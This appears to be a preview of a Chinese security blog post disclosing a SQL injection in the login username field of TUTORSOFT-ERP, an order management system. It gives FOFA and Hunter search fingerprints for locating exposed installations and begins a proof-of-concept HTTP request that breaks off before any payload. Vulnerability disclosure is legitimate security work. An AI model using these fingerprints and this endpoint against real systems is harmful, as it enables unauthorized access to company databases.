1Day-某订单管理系统存在SQL注入漏洞

文章预览

免责声明 由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号 狐狸说安全 及作者不为 此 承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉，谢谢！ 0x01 概述 佛山市杜特软件科技有限公司从事企业管理软件的开发与推广,前身杜特计算机营销服务中心,成立于2002年,经过多年的发展积累,为客户提供解决方案,公司致力门窗行业软件，增加门窗厂生成效率，节约生产、流通成本。 0x02 正文 Fofa指纹：app="TUTORSOFT-ERP" 鹰图指纹：web.title=="欢迎登陆到网上订单系统" 漏洞点位于登陆口用户名处 sqlmap直接梭哈： 漏洞POC： POST /ajax/Login.ashx HTTP/1.1 Host : xxxxxx Content-Length : 80 Sec-Ch-Ua-Platform : "Windows" X-Requested-With : XMLHttpRequest User-Agent : Mozilla/5.0 (Windows NT 10.0; Win6 ………………………………